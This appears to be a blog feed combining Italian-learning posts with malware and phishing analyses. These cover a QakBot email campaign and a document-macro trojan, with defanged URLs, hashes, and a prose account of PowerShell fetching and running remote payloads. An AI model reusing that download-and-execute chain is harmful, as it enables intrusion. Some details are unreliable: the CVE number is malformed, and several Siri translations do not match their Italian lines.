<p>to understand</p> <p>catturare</p> <p>to catch</p> <p>cenare &nbsp;</p> <p>to have dinner</p> <p>cercare &nbsp;</p> <p>to look for</p> <p>chiamare</p> <p>to call</p> <p>chiamarsi &nbsp;</p> <p>to be called</p> <p>chiedere &nbsp;</p> <p>to ask</p> <p>chiudere &nbsp;</p> <p>to close</p> <p>collegare</p> <p>to plug</p> <p>comportarsi &nbsp;</p> <p>to behave</p> <p>comprare &nbsp;</p> <p>to buy</p> <p>condividi</p> <p>to share</p> <p>condurre</p> <p>to lead</p> <p>confrontare</p> <p>to compare</p> <p>conoscere</p> <p>to get to know</p> <p>consentire</p> <p>to allow</p> <p>contare</p> <p>to count</p> <p>correre &nbsp;</p> <p>to run</p> <p>costare</p> <p>to cost</p> <p>creare</p> <p>to create</p> <p>credere</p> <p>to believe</p> <p>crescere</p> <p>to grow</p> <p>cucinare</p> <p>to cook</p> <p>cuocere &nbsp;</p> <p>to cook</p> <p>dare</p> <p>to give</p> <p>deciderare</p> <p>to decide</p> <p>decomprimere</p> <p>to unclasp</p> <p>desidera</p> <p>to want/desire</p> <p>dimenticare</p> <p>to forget</p> <p>dipingere</p> <p>to paint</p> <p>dire &nbsp;</p> <p>to say</p> <p>discutere</p> <p>to argue</p> <p>disegnare</p> <p>to draw</p> <p>dispiacere &nbsp;</p> <p>to be sorry</p> <p>disturbare</p> <p>to disturb</p> <p>diventare &nbsp;</p> <p>to become</p> <p>divertirsi &nbsp;</p> <p>to have fun</p> <p>doccia</p> <p>to shower</p> <p>dormire</p> <p>to sleep</p> <p>dotare</p> <p>to endow</p> <p>dovere</p> <p>must/shall</p> <p>entrare &nbsp;</p> <p>to enter</p> <p>essere &nbsp;</p> <p>to be</p> <p>fare</p> <p>to do / to make</p> <p>ferire</p> <p>to hurt</p> <p>fermare</p> <p>to stop</p> <p>festeggiare</p> <p>to celebrate</p> <p>finire &nbsp;</p> <p>to finish/end</p> <p>fumire</p> <p>to smoke</p> <p>gara</p> <p>to race</p> <p>giocare</p> <p>to play</p> <p>godere &nbsp;</p> <p>to enjoy</p> <p>gridare</p> <p>to cry / shout</p> <p>guadagnare</p> <p>to earn</p> <p>guardare &nbsp;</p> <p>to watch</p> <p>imparare</p> <p>to learn</p> <p>incontrare</p> <p>to meet</p> <p>indossare</p> <p>to wear</p> <p>infastidire</p> <p>to annoy</p> <p>informare</p> <p>to inform</p> <p>iniziare &nbsp;</p> <p>to start / begin</p> <p>installare</p> <p>to install</p> <p>interessare &nbsp;</p> <p>to interest</p> <p>inviare</p> <p>to send</p> <p>invitare &nbsp;</p> <p>to invite</p> <p>lasciare &nbsp;</p> <p>to leave, to let</p> <p>lavare</p> <p>to wash</p> <p>lavorare &nbsp;</p> <p>to work</p> <p>leggere &nbsp;</p> <p>to read</p> <p>mancare</p> <p>to miss</p> <p>mandare &nbsp;</p> <p>to send</p> <p>mangiare</p> <p>to eat</p> <p>mentire</p> <p>to lie</p> <p>mettere &nbsp;</p> <p>to put</p> <p>morire &nbsp;</p> <p>to die</p> <p>mostrare</p> <p>to show</p> <p>nascere &nbsp;</p> <p>to be born</p> <p>nascondere</p> <p>to hide</p> <p>nevicare</p> <p>to snow</p> <p>nuotare</p> <p>to swim</p> <p>odiare</p> <p>to hate</p> <p>offerta</p> <p>to offer</p> <p>ordinare &nbsp;</p> <p>to order</p> <p>ottenere</p> <p>to get</p> <p>pagare</p> <p>to pay</p> <p>parlare</p> <p>to speak</p> <p>partire &nbsp;</p> <p>to leave</p> <p>pensare &nbsp;</p> <p>to think</p> <p>perdere</p> <p>to lose</p> <p>piacere &nbsp;</p> <p>to like</p> <p>piovere</p> <p>to rain</p> <p>portare &nbsp;</p> <p>to bring</p> <p>porre</p> <p>to ask</p> <p>potere &nbsp;</p> <p>can, to be able to</p> <p>pranzare &nbsp;</p> <p>to have lunch</p> <p>prendere</p> <p>to take</p> <p>preparare</p> <p>to prepare</p> <p>presentare</p> <p>to introduce</p> <p>provare</p> <p>to try</p> <p>pulire</p> <p>to clean</p> <p>raccomandare</p> <p>to recommend</p> <p>ricercare</p> <p>to search</p> <p>ricevere</p> <p>to receive</p> <p>ricordare &nbsp;</p> <p>to remember</p> <p>ridete</p> <p>to laugh</p> <p>rimanere &nbsp;</p> <p>to stay</p> <p>ringraziare</p> <p>to thank</p> <p>riparazione</p> <p>to repair</p> <p>ripetere</p> <p>to repeat</p> <p>riposare</p> <p>to rest</p> <p>rispondere &nbsp;</p> <p>to reply</p> <p>risposta</p> <p>to reply</p> <p>risvegliare</p> <p>to rouse</p> <p>rompere</p> <p>to break</p> <p>rubare</p> <p>to steal</p> <p>salire &nbsp;</p> <p>to go up</p> <p>salutare &nbsp;</p> <p>to greet</p> <p>sapere</p> <p>to know</p> <p>scaricare</p> <p>to download</p> <p>scegliete</p> <p>to choose</p> <p>scendere</p> <p>to get off</p> <p>scrivere &nbsp;</p> <p>to write</p> <p>scusarsi</p> <p>to apologize</p> <p>sedere</p> <p>to sit</p> <p>seguire</p> <p>to follow</p> <p>sembrare &nbsp;</p> <p>to seem</p> <p>sentire</p> <p>to feel</p> <p>sento odore di</p> <p>to smell</p> <p>servire &nbsp;</p> <p>to serve / to need</p> <p>significare</p> <p>to mean</p> <p>sognare</p> <p>to dream</p> <p>sorridere</p> <p>to smile</p> <p>sparare</p> <p>to shoot</p> <p>spedire</p> <p>to mail</p> <p>spegnere</p> <p>to shut down</p> <p>sperare &nbsp;</p> <p>to hope</p> <p>spiegare</p> <p>to explain</p> <p>spingere</p> <p>to push</p> <p>sposare</p> <p>to marry</p> <p>spostare</p> <p>to move</p> <p>stampare</p> <p>to press</p> <p>studiare &nbsp;</p> <p>to study</p> <p>svegliarsi</p> <p>to wake up</p> <p>tagliare</p> <p>to cut</p> <p>telefonare &nbsp;</p> <p>to phone</p> <p>tenere</p> <p>to hold</p> <p>tentare</p> <p>to attempt</p> <p>tirare</p> <p>to pull</p> <p>toccare</p> <p>to touch</p> <p>tornare &nbsp;</p> <p>to return</p> <p>tradurre &nbsp;</p> <p>to translate</p> <p>traslocare</p> <p>to move out</p> <p>trovare &nbsp;</p> <p>to find</p> <p>usare &nbsp;</p> <p>to use</p> <p>uscire &nbsp;</p> <p>to exit</p> <p>vedere &nbsp;</p> <p>to see</p> <p>vedi</p> <p>to see</p> <p>vendere</p> <p>to sell</p> <p>venire &nbsp;</p> <p>to come</p> <p>viaggiare</p> <p>to travel</p> <p>vietare</p> <p>to prohibit</p> <p>vincere &nbsp;</p> <p>to win</p> <p>visitare &nbsp;</p> <p>to visit</p> <p>vivere &nbsp;</p> <p>to live</p> <p>volare</p> <p>to fly</p> <p>volere &nbsp;</p> <p>to want</p> <p>If you use an app such as <a href="https://www.ankiapp.com/">AnkiApp</a>, you can import this word list with a csv like so:</p> <p><a href="https://blog.ericturner.it/uploads/2023/04/verbi_di_italiano_UTF8.webp">verbi_di_italiano_UTF8</a><a href="https://blog.ericturner.it/uploads/2023/04/verbi_di_italiano_UTF8.webp">Download</a></p>2023-04-18T12:04:00-04:002023-04-18T12:04:00-04:00Eric Turnertag:blog.ericturner.it,2023-04-18:/2023/04/18/qakbot-campaign-6apr2023/

<h2 id="correspondence">Correspondence</h2> <p>Sender</p> <p>Subject</p> <p>Attachment Name</p> <p>Attachment Hash (with VirusTotal link)</p> <p>clemke[@]e-chuppah[.]com</p> <p>RE: New Borrowers</p> <p>AK.pdf</p> <p><a href="https://www.virustotal.com/gui/file/9521bc74735d1300e182eaa98299023ba08acc9af17b85cc50b3938c99bd0b32">9521bc74735d1300e182eaa98299023ba08acc9af17b85cc50b3938c99bd0b32</a></p> <p>aschaden[@]shopbarbay[.]com</p> <p>FW: Check Image Request</p> <p>NI.pdf</p> <p><a href="https://www.virustotal.com/gui/file/93482d229926521cfc0000bda2e931181e0f06f4a9f808f0068634678ae9a0fc">93482d229926521cfc0000bda2e931181e0f06f4a9f808f0068634678ae9a0fc</a></p> <p>wtremblay[@]aaofoo[.]com</p> <p>RE: Cashing Third Party Checks</p> <p>CT.pdf</p> <p><a href="https://www.virustotal.com/gui/file/77a2b75334a8e3a4e2960e0c1600a1ea14933bba1f4a7297ad177e140f3302f2">77a2b75334a8e3a4e2960e0c1600a1ea14933bba1f4a7297ad177e140f3302f2</a></p> <p>se[.]jursnaeb[@]adyasiddhi[.]com</p> <p>RE: Hello--</p> <p>TX.pdf</p> <p><a href="https://www.virustotal.com/gui/file/3a0141a9b22639c969244967676c999757406383cf8eb0eb75a9e89176661045">3a0141a9b22639c969244967676c999757406383cf8eb0eb75a9e89176661045</a></p> <p>This …</p>

<h2 id="correspondence">Correspondence</h2> <p>Sender</p> <p>Subject</p> <p>Attachment Name</p> <p>Attachment Hash (with VirusTotal link)</p> <p>clemke[@]e-chuppah[.]com</p> <p>RE: New Borrowers</p> <p>AK.pdf</p> <p><a href="https://www.virustotal.com/gui/file/9521bc74735d1300e182eaa98299023ba08acc9af17b85cc50b3938c99bd0b32">9521bc74735d1300e182eaa98299023ba08acc9af17b85cc50b3938c99bd0b32</a></p> <p>aschaden[@]shopbarbay[.]com</p> <p>FW: Check Image Request</p> <p>NI.pdf</p> <p><a href="https://www.virustotal.com/gui/file/93482d229926521cfc0000bda2e931181e0f06f4a9f808f0068634678ae9a0fc">93482d229926521cfc0000bda2e931181e0f06f4a9f808f0068634678ae9a0fc</a></p> <p>wtremblay[@]aaofoo[.]com</p> <p>RE: Cashing Third Party Checks</p> <p>CT.pdf</p> <p><a href="https://www.virustotal.com/gui/file/77a2b75334a8e3a4e2960e0c1600a1ea14933bba1f4a7297ad177e140f3302f2">77a2b75334a8e3a4e2960e0c1600a1ea14933bba1f4a7297ad177e140f3302f2</a></p> <p>se[.]jursnaeb[@]adyasiddhi[.]com</p> <p>RE: Hello--</p> <p>TX.pdf</p> <p><a href="https://www.virustotal.com/gui/file/3a0141a9b22639c969244967676c999757406383cf8eb0eb75a9e89176661045">3a0141a9b22639c969244967676c999757406383cf8eb0eb75a9e89176661045</a></p> <p>This particular campaign came from various senders. All attachment names were similar to a two-letter US state abbreviation format.</p> <h2 id="file-analysis">File Analysis</h2> <p>TX.pdf was also uploaded to Hybrid Analysis for further inspection, <a href="https://www.hybrid-analysis.com/sample/3a0141a9b22639c969244967676c999757406383cf8eb0eb75a9e89176661045">here</a>. The PDF contained a link to download the next stage, an encrypted ZIP: </p> <p><img alt="" src="https://blog.ericturner.it/uploads/2024/12/image-3.webp"/></p> <p><img alt="" src="https://blog.ericturner.it/uploads/2024/12/image-1.webp"/></p> <p>The second stage downloads PowerShell which then attempts to enumerate a list of compromised domains in order to continue. The sample that I tested had all dead links and did not proceed to the PowerShell script download however it matched similar behavior to this, <a href="https://securelist.com/qbot-banker-business-correspondence/109535/">QBot banker delivered through business correspondence | Securelist</a>.</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2024/12/image-4.webp"/></p> <h2 id="indicators">Indicators</h2> <p><strong>SHA256</strong></p> <p>9521bc74735d1300e182eaa98299023ba08acc9af17b85cc50b3938c99bd0b32</p> <p>93482d229926521cfc0000bda2e931181e0f06f4a9f808f0068634678ae9a0fc</p> <p>77a2b75334a8e3a4e2960e0c1600a1ea14933bba1f4a7297ad177e140f3302f2</p> <p>3a0141a9b22639c969244967676c999757406383cf8eb0eb75a9e89176661045</p> <p><strong>URLs</strong><br/> hxxps://vcallc[.]us/ines/ines[.]php (First Stage, ZIP Dropper)</p>2023-03-22T15:37:00-04:002023-03-22T15:37:00-04:00Eric Turnertag:blog.ericturner.it,2023-03-22:/2023/03/22/trojan-kryptic-22-mar-2023/

<h1 id="initial-email">Initial Email</h1> <p>An email was discovered from comel[@]industry-mass[.]com. This site was created within the last 15 days.<br/> The email was titled Tax return 2022 and contained a .docx file.</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2024/12/image-5.webp"/></p> <p>Opening this file initially looks like an actual tax return. I have redacted the private information from the screenshot …</p>

<h1 id="initial-email">Initial Email</h1> <p>An email was discovered from comel[@]industry-mass[.]com. This site was created within the last 15 days.<br/> The email was titled Tax return 2022 and contained a .docx file.</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2024/12/image-5.webp"/></p> <p>Opening this file initially looks like an actual tax return. I have redacted the private information from the screenshot </p> <p><img alt="" src="https://blog.ericturner.it/uploads/2024/12/image-7.webp"/></p> <p>Behind the scenes, a macro runs that exploits the CVE-2022-301090 MSDT vulnerability. </p> <h1 id="payload-stage-1-msdt-vulnerability">Payload Stage 1: MSDT Vulnerability</h1> <p>The macro calls out to hxxps:\files[.]catbox[.]moe/sndoli[.]hta which contains obfuscated script. </p> <p><img alt="" src="https://blog.ericturner.it/uploads/2024/12/image-8.webp"/></p> <p>When chained with the CVE-2022-301090 vuln, this becomes powershell that makes an IEX request to hxxps://powpowpowffs5[.]blogspot[.]com/atom.xml. This URL immediately 302 redirects to 529f38d0-3744-4286-b484-be860d475d25[.]usrfiles[.]com/ugd/529f38_05b9ed78f84140d6b73380af191cbd42.txt for the stage 2 powershell.</p> <h1 id="payload-stage-2-main-powershell">Payload Stage 2: Main Powershell</h1> <p><img alt="" src="https://blog.ericturner.it/uploads/2024/12/image-9.webp"/></p> <p><img alt="" src="https://blog.ericturner.it/uploads/2024/12/image-10.webp"/></p> <p>More obfuscation. The initial steps of the script kills several windows processes, it then saves the payload to C:\ProgramFiles\MEMEMAN\CypherDeptoggraphy.~+~ before decrypting to a ScheduledTask creation for the file C:\ProgramData\MEMEMAN\UpdateEscan.js.</p> <h1 id="execution">Execution</h1> <p>The final payload was downloaded and executed within PowerShell around 2:17p 22 Mar. The payload was able to successfully copy itself &amp; create additional files to the MEMEMAN dir. Next it cloned itself to the Windows startup directory and create the two scheduled tasks to maintain persistence.</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2024/12/image-11.webp"/></p> <p>Antivirus detection of proces</p> <h1 id="indicators">Indicators</h1> <h2 id="hashes"><strong>Hashes</strong></h2> <p><strong>SHA256 Hash</strong></p> <p><strong>Description</strong></p> <p>9e49747bcd7e4eea173a793a0a6c34f3533dc23cf6565d32e4de3a33ad3c8fed</p> <p>SHA2 of initial .docx file</p> <p>dac71c21f264036c2c0288340ad6889002a4ed8f4dee74da35b15f7a8a26b473</p> <p>SHA2 of the .hta file</p> <p>a905e397a6bb3374a54fa8ebccf57ff3b8d0f2cd0aca4c9091b0b19fd85d67b3</p> <p>SHA2 of the master payload</p> <p>9c7aefd09d3939a04aa2e36e553881b3ffd88efe8fdda7121a80f37653606b0d</p> <p>SHA2 of REALENGINEUPDATE.js, a persistence file spawned by the execution of the master payload</p> <p>6b4fb85973c337fd7cf1b272ab313557a2d256314ab599638fac3ba3d6e8ffb7</p> <p>SHA2 of UpdateEscan.js, a persistence file spawned by the execution of the master payload</p> <p>e7831599adde64042091b5db47032e3a3c3b2f7b8720156900b38f35ca2d8936</p> <p>SHA2 of WindowsDEFENDERUPDATE.js, a persistence file spawned by the execution of the master payload</p> <p>9b57c468f4df5bbedb75d0027348a2dd278e4d168b83a6e74c777d6737de0606</p> <p>SHA2 of CypherDeptography.~_~, a persistence file spawned by the execution of the master payload</p> <h2 id="urls"><strong>URLs</strong></h2> <p><strong>URL</strong></p> <p><strong>Description</strong></p> <p>urlcallinghta6[.]blogspot[.]com/atom[.]xml</p> <p>1st URL request from .docx file</p> <p>files[.]catbox[.]moe/sndoli[.]hta</p> <p>2nd URL that was the result of a 302 redirect from 1st URL.</p> <p>powpowpowffs5[.]blogspot[.]com/atom[.]xml</p> <p>3rd URL that was contacted from the decoded powershell code in sndoli.hta</p> <p>529f38d0-3744-4286-b484-be860d475d25[.]usrfiles.com/ugd/529f38_05b9ed78f84140d6b73380af191cbd42[.]txt</p> <p>4th URL that was the result of a 302 redirect from 3rd URL</p> <p>bakc2000[.]blogspot.com/atom[.]xml</p> <p>URL used by one of the files for persistence, re</p> <p>backuphotelall[.]blogspot.com/atom[.]xml</p> <p>URL used by one of the files for persistence</p> <h1 id="other-resources_1">Other Resources</h1> <ul> <li><a href="https://www.hybrid-analysis.com/sample/a905e397a6bb3374a54fa8ebccf57ff3b8d0f2cd0aca4c9091b0b19fd85d67b3/641b43305411ea5d800475e5">HybridAnalysis Report on Master Payload</a></li> <li><a href="https://twitter.com/c_APT_ure/status/1632117065493405698">@c_apt_ur on Twitter discovering atom.xml files being used in a similar attack</a></li> </ul>2023-03-16T21:23:20-04:002023-03-16T21:23:20-04:00Eric Turnertag:blog.ericturner.it,2023-03-16:/2023/03/16/bigliettino-di-siri-siri-cheat-sheet/

<p>I've found that Siri can be great for practicing speaking and listening in a new language, plus it helps you learn critical phrases that are used on a day to day basis. Here's a cheat sheet of things to ask Siri. Most of this was sourced from the Apple Support …</p>

<p>I've found that Siri can be great for practicing speaking and listening in a new language, plus it helps you learn critical phrases that are used on a day to day basis. Here's a cheat sheet of things to ask Siri. Most of this was sourced from the Apple Support pages but is on one page for ease of reference.</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2023/03/image.webp"/></p> <h1 id="fare-una-chiamata">Fare una chiamata</h1> <p>Ehi Siri, chiama mamma.</p> <p><em>Hey Siri, call Mom</em></p> <p>Ehi Siri, chiama il cellulare di Marco in vivavoce.</p> <p><em>Hey Siri, call Marco's cell on speaker</em></p> <p><img alt="" src="https://blog.ericturner.it/uploads/2023/03/image-1.webp"/></p> <h1 id="inviare-un-messaggio">Inviare un messaggio</h1> <p>Ehi Siri, invia un messaggio a Laura.</p> <p><em>Hey Siri, send a message to Laura.</em></p> <p>Ehi Siri, invia un messaggio di testo a Sofia e Adriano che dice: &lsquo;Dove siete?'</p> <p><em>Hey Siri, send a text message to Sofia and Adriano that says, "Where are you?"</em></p> <p><img alt="" src="https://blog.ericturner.it/uploads/2023/03/image-9.webp"/></p> <h1 id="scoprire-il-meteo">Scoprire il meteo</h1> <p>Ehi Siri, che tempo far&agrave; oggi?</p> <p><strong>Hey Siri, what's the weather like today?</strong></p> <p>Ehi Siri, avr&ograve; bisogno di un ombrello domani?</p> <p><em>Hey Siri, will I need an umbrella tomorrow?</em></p> <p><img alt="" src="https://blog.ericturner.it/uploads/2023/03/image-5.webp"/></p> <h1 id="trovare-posti-e-indicazioni">Trovare posti e indicazioni</h1> <p>Ehi Siri, trova un bar nelle vicinanze.</p> <p><em>Hey Siri, find a caf&eacute;&nbsp;nearby.</em></p> <p>Ehi Siri, trova le indicazioni per tornare a casa.</p> <p><em>Hey Siri, find directions home.</em></p> <p>Ehi Siri, andiamo a casa</p> <p><em>Hey Siri, let's go home.</em></p> <p>Ehi Siri, a che ora chiude l'Apple&nbsp;Store?</p> <p><em>Hey Siri, what time does the Apple Store close?</em></p> <p>Ehi Siri, com'&egrave; il traffico nel centro di San Francisco?</p> <p><em>Hey Siri, how's the traffic in downtown San Francisco?</em></p> <p><img alt="" src="https://blog.ericturner.it/uploads/2023/03/image-6.webp"/></p> <h1 id="ascolta-la-musica-e-podcast">Ascolta la musica e podcast</h1> <p>Ehi Siri, riproduci i brani pi&ugrave; popolari di Taylor Swift.</p> <p><em>Hey Siri, play Taylor Swift's most popular songs.</em></p> <p>Ehi Siri, fammi sentire il nuovo album di Tame Impala.</p> <p><em>Hey Siri, let me hear Tame Impala's new album.</em></p> <p>Ehi Siri, vorrei ascoltare un po' di rock alternativo degli anni '90.</p> <p><em>Hey Siri, I'd like to listen to some alternative rock from the 90s.</em></p> <p>Ehi Siri, riproduci musica adatta a una giornata di pioggia.</p> <p><em>Hey Siri, play music suitable for a rainy day.</em></p> <p>Ehi Siri, fammi sentire un po' di musica rilassante.</p> <p><em>Hey Siri, let me hear some relaxing music.</em></p> <p>Ehi Siri, riproduci il podcast 'You're Wrong About'.</p> <p><em>Hey Siri, play the podcast 'You're Wrong About'</em>.</p> <p>Ehi Siri, metti in pausa.</p> <p><em>Hey Siri, pause.</em></p> <p>Ehi Siri, salta questo brano.</p> <p><em>Hey Siri, skip this song.</em></p> <p>Ehi Siri, ripeti la riproduzione di questo brano.</p> <p><em>Hey Siri, repeat this song.</em></p> <p>Ehi Siri, alza il volume.</p> <p><em>Hey Siri, raise the volume.</em></p> <p>Ehi Siri, torna indietro di 30 secondi.</p> <p><em>Hey Siri, go back 30 seconds.</em></p> <p>Ehi Siri, riproducilo a velocit&agrave; doppia.</p> <p><em>Hey Siri, play at 2x speed</em></p> <p>Ehi Siri, vai avanti di 10 minuti.</p> <p><em>Hey Siri, go ahead 10 minutes.</em></p> <p>Ehi Siri, fammi sentire altri brani simili.</p> <p><em>Hey Siri, let me hear similar songs</em>.</p> <p>Ehi Siri, chi canta questo brano?</p> <p><em>Hey Siri, who sings this song?</em></p> <p>Ehi Siri, in quale album &egrave; presente?</p> <p><em>Hey Siri, which album is it in?</em></p> <p>Ehi Siri, qual &egrave; il nome di questo brano?</p> <p><em>Hey Siri, what is the name of this song?</em></p> <p>Ehi Siri, aggiungi questo brano alla mia playlist di allenamento.</p> <p><em>Hey Siri, add this song to my workout playlist.</em></p> <p><img alt="" src="https://blog.ericturner.it/uploads/2023/03/image-7.webp"/></p> <h1 id="controllare-labitazione">Controllare l'abitazione</h1> <p>Ehi Siri, accendi le luci.</p> <p><em>Hey Siri, find a caf&eacute;&nbsp;nearby.</em></p> <p>Ehi Siri, spegni il ventilatore.</p> <p><em>Hey Siri, find directions home.</em></p> <p>Ehi Siri, accendi il riscaldamento.</p> <p><em>Hey Siri, let's go home.</em></p> <p>Ehi Siri, spegni il ventilatore in camera da letto a mezzogiorno.</p> <p><em>Hey Siri, turn off the bedroom fan at noon.</em></p> <p>Ehi Siri, spegni le luci nello studio.</p> <p><em>Hey Siri, turn off the lights in the studio.</em></p> <p>Ehi Siri, abilita il mio sistema di sicurezza.</p> <p><em>Hey Siri, enable my security system.</em></p> <p>Ehi Siri, la porta del garage &egrave; aperta?</p> <p><em>Hey Siri, is the garage door open?</em></p> <p>Ehi Siri, le luci di sotto sono accese?</p> <p><em>Hey Siri, are the lights downstairs on?</em></p> <p>Ehi Siri, imposta la temperatura a 20&nbsp;gradi.</p> <p><em>Hey Siri, set the temperature to 20 degrees.</em></p> <p>Ehi Siri, chiudi la porta d'ingresso.</p> <p><em>Hey Siri, lock the front door.</em></p> <p>Ehi Siri, regola l'illuminazione sul 50% al piano di sotto.</p> <p><em>Hey Siri, adjust the brightness downstairs to 50%</em></p> <p>Ehi Siri, imposta le luci al 25% in ufficio.</p> <p><em>Hey Siri, set the lights to 25% in the office.</em></p> <p><img alt="" src="https://blog.ericturner.it/uploads/2023/03/image-8.webp"/></p> <h1 id="trovare-informazioni-e-altro">Trovare informazioni e altro</h1> <p>Ehi Siri, quanto &egrave; alto il monte Everest?</p> <p><em>Hey Siri, how tall is Mount Everest?</em></p> <p>Ehi Siri, dov'&egrave; il mio iPhone?</p> <p><em>Hey Siri, where's my iPhone?</em></p> <p>Ehi Siri, dimmi le ultime notizie sportive.</p> <p><em>Hey Siri, give me the latest sports news.</em></p> <p>Ehi Siri, chi &egrave; in testa alla classifica della Premier League in questo momento?</p> <p><em>Hey Siri, who is leading in the Premier League right now?</em></p> <p>Ehi Siri, qual &egrave; la capitalizzazione di mercato di Apple?</p> <p><em>Hey Siri, what's Apple's market capitalization?</em></p> <p>Ehi Siri, confronta AAPL e NASDAQ.</p> <p><em>Hey Siri, compare AAPL and NASDAQ.</em></p> <p>Ehi Siri, quanti millilitri ci sono in una tazza?</p> <p><em>Hey Siri, how many milliliters are in a cup?</em></p> <p>Ehi Siri, imposta un timer di 45 minuti.</p> <p><em>Hey Siri, set a 45-minute timer.</em></p> <p>Ehi Siri, quanta caffeina c'&egrave; nel caff&egrave;?</p> <p><em>Hey Siri, how much caffeine is in coffee?</em></p> <p>Ehi Siri, che ore sono a Berlino?</p> <p><em>Hey Siri, what time is it in Berlin?</em></p> <p>Ehi Siri, quando entra in vigore l'ora legale?</p> <p><em>Hey Siri, when does daylight savings time go into effect?</em></p> <p>Ehi Siri, svegliami domani alle 6:00.</p> <p><em>Hey Siri, wake me up tomorrow at 6:00.</em></p> <p>Ehi Siri, come si dice 'buongiorno' in tedesco?</p> <p><em>Hey Siri, how do you say 'good morning' in German?</em></p> <p>Ehi Siri, quale film ha vinto l'Oscar al miglior film l'anno scorso?</p> <p><em>Hey Siri, which movie won the Oscar for Best Picture last year?</em></p> <h1 id="references">References</h1> <p><a href="https://support.apple.com/it-it/siri">Cosa posso chiedere a Siri? - Supporto&nbsp;Apple ufficiale</a></p> <p><a href="https://support.apple.com/it-it/HT208279">Usare Siri per ascoltare la musica e i podcast - Supporto Apple (IT)</a></p> <p><a href="https://support.apple.com/it-it/HT208336">Fare di pi&ugrave; con Siri - Supporto Apple (IT)</a></p> <p><a href="https://support.apple.com/it-it/HT208280">Controllare l'abitazione con Siri - Supporto Apple (IT)</a></p>2022-04-22T00:54:07-04:002022-04-22T00:54:07-04:00Eric Turnertag:blog.ericturner.it,2022-04-22:/2022/04/22/odd-phishing-link/

<p>Friend sent me a strange message she got with the following link: </p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/04/image-7.webp"/></p> <p>Thanks government, for giving me my money back on some strange link</p> <h1 id="attempt-1-www">Attempt 1: www</h1> <p>I booted into my REMnux VM and turned on Burp suite to intercept the traffic. If you leave off the trailing slash (like …</p>

<p>Friend sent me a strange message she got with the following link: </p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/04/image-7.webp"/></p> <p>Thanks government, for giving me my money back on some strange link</p> <h1 id="attempt-1-www">Attempt 1: www</h1> <p>I booted into my REMnux VM and turned on Burp suite to intercept the traffic. If you leave off the trailing slash (like in the text above), it just redirects to <code>/Indiana/g/</code> then proceeds as following:</p> <p>Step 1: Link redirects to dnkshop <dot> net:</dot></p> <p><img alt="Screenshot showing a 302 URL redirection to dnk shop &lt;dot&gt; net" src="https://blog.ericturner.it/uploads/2022/04/IMG_3112.webp"/></p> <p>Step 2: dnk shop redirects to itself, but now with a sid cookie and a JWT token</p> <p><img alt="redirect to dnk shop (itself) again, but with a JWT token and sid cookie set." src="https://blog.ericturner.it/uploads/2022/04/IMG_3551.webp"/></p> <p>I decoded the JWT token, it was created, presumably, by the library <a href="https://github.com/joken-elixir/joken">Joken</a>. This is a <a href="https://hex.pm/packages/joken">library</a> for a programming language called Elixir.</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/04/IMG_9705.webp"/></p> <p>JWT decoded</p> <p>With the token and cookie set, it just immediately redirects you to a new booknower <dot> com URL with some random strings in the URL:</dot></p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/04/IMG_3698.webp"/></p> <p>Another redirect</p> <p>Finally, this URL just redirects back to google.:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/04/IMG_0367.webp"/></p> <p>I tried to mess with the parameters of the booknower URL but I kept getting 503 errors like the server was down. I noticed if I retired the URL, the sequence was now different.</p> <h1 id="attempt-2-ww1">Attempt 2: ww1</h1> <p>In this attempt, it navigated me to ww1 <dot> dnkshop <dot> net this time:</dot></dot></p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/04/image-8.webp"/></p> <p>This time the contents of the page were way different. It set an adblock cookie and loaded a <code>parking.2.86.1.js</code> file. It also contains another token/base64 string to a <code>window.park</code></p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/04/image-9.webp"/></p> <p>Decoding this gives a JSON response basically building the request headers and contains my IP (which in this instance is going through a VPN).</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/04/image-10.webp"/></p> <p>I also checked out the JS file. It is very long and has mentions to bodis <dot> com, the code is also semi-obfuscated. All the variable names are just random letters. I looked up bodis.com and it appears to be a legitimate domain that uses some sort of tracking pixel for advertisements as per <a href="https://www.bodis.com/blog/new-feature-google-analytics-tracking">this page</a>.</dot></p> <p>Next, I am redirect and it makes two <code>POST</code> requests on the <code>www1&lt;dot&gt;dnkshop&lt;dot&gt;net</code> domain, to <code>/_fd</code> first:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/04/image-11.webp"/></p> <p>Which then appears to take that content and use it as a signature in it's request to <code>/_zc</code>:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/04/image-12.webp"/></p> <p>I then get redirected to GoDaddy's purchase page to try and buy the dnkshop domain myself:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/04/image-13.webp"/></p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/04/IMG_3589.webp"/></p> <p>Which it does happen to be available, interestingly. My assumption is after tracking all of the requests, it perhaps is hoping the end-user is signed into GoDaddy and maybe the cookies would try to auto-purchase the domain for you?</p> <h1 id="attempt-3-ww2">Attempt 3: ww2</h1> <p>It's interesting because each time I click the link, the URL it first sends me to appears to change. Let's check this rabbit hole.</p> <p>It has further tracking cookies that track the sale form:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/04/image-14.webp"/></p> <p>And it also sends a big blob of data to itself on the <code>/ls.php</code> endpoint:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/04/image-15.webp"/></p> <h1 id="further-attempts">Further Attempts</h1> <p>I ran it a bunch of different times and it would vary between "domain for sale" pages, but once I got redirected through another few hoops to a "job posting" page. </p> <p>From the booknower website again, but now to american listed:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/04/image-16.webp"/></p> <p>Which then redirects to an ad campaign, that redirects me to jobs in New York (where my VPN is currently set):</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/04/image-17.webp"/></p> <p>Then it hops through a bunch of other trackers and a jobhelper<dot>com website:</dot></p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/04/image-18.webp"/></p> <h1 id="conclusion">Conclusion</h1> <p>This URL is definitely odd. It always will redirect to the dnkshop <dot> net, with variations 